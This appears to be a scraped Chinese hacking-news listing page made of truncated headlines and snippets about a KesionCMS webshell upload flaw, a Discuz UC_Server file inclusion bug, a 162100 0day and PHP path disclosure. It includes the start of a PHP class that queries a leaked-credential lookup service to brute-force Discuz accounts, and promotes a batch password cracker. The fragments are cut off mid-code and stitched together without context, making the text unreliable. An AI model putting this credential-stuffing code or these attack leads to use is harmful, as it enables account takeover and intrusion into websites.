科讯KESION CMS最新版任意文件上传WEBSHELL

会员上传文件漏洞,可以上传任意后缀

昨日IOS更新,苹果 修复了22个Safari漏洞

写在前面:

走近世界上第一个地下黑市搜索引擎

我们经常谈论地下论坛、非法网站或黑市,但是,正如他们的本质是属“地下”的,即运行在“洋葱网络(Onion network)”下的

你早已被窃听:小心身边不起眼的东西

据可靠FB线人透露:

Discuz爆破无视验证码 牛逼到能调用社工库爆破!

<?php
class fuckdz{
 
 
    public function sgk($user){
        $a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");
        $a=iconv("UTF-8", "GB2312//IGNORE", $a);
        preg_match_all("/7%\">(.*)

Discuz UC_Server 本地文件包含漏洞

看到有位朋友提交到了乌云,那我就把这个包含放出来吧。

http://www.wooyun.org/bugs/wooyun-2014-062388

##

Discuz批量用户密码暴力破解器

1.支持discuz X1/1.5/2/2.5/3/3.1 等版本。

2.程序会自动判断编码。

3.有验证码的爆破不了。

PHP暴露网站绝对路径的新方法(二)

<?php
$a=$_GET["id"];#$a=array(array(1));function now($a){
  if(is_array($a)){
    foreach($a as $key => $val){
      $a[$key]=now($val);
    }
  }else{
    $a=addslashes($a);
  }
  return $a;}print_r(now($a));?>
http://xxx.com/x

162100网址导航最新0day

漏洞页面:

Win8是如何引导你把文件同步至美国的

近日,一则名为《